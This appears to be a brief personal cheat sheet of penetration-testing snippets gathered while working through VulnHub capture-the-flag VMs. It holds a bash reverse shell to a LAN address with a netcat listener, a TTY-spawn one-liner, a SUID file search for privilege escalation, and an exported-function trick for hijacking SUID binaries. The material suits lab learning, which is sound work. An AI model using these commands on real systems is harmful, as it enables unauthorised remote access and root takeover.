Related links
- VulnHub
- Tr0ll VM which I rooted
- Tr0ll2 VM which I failed because I didn't think to try shellshock
- Great walkthrough from which I learned the nifty trick of bash function name masking a binary (Snippet 1)
Snippets
Spawn TTY
python -c 'import pty;pty.spawn("/bin/bash")'
Related: Why do you need tty for sudo
Redirect bash to tcp socket
/bin/bash -i >& /dev/tcp/192.168.0.107/6666 0>&1
# then at receiver:
nc -l -n -v -p 6666
# And wait for incoming bash shell
Find SUID/SGUID files for privilege escalation
find / -user root -perm -4000 -print 2>/dev/null
Of course if you can somehow exploit these results, you might get root
Hijack a binary's full path in bash to exec your own code
$ function /usr/bin/foo () { /usr/bin/echo "It works"; }
$ export -f /usr/bin/foo
$ /usr/bin/foo
It works
Of course you might want this if a SUID bit programing is calling some binary by full path and you cannot alter that binary but want to hijack the execution.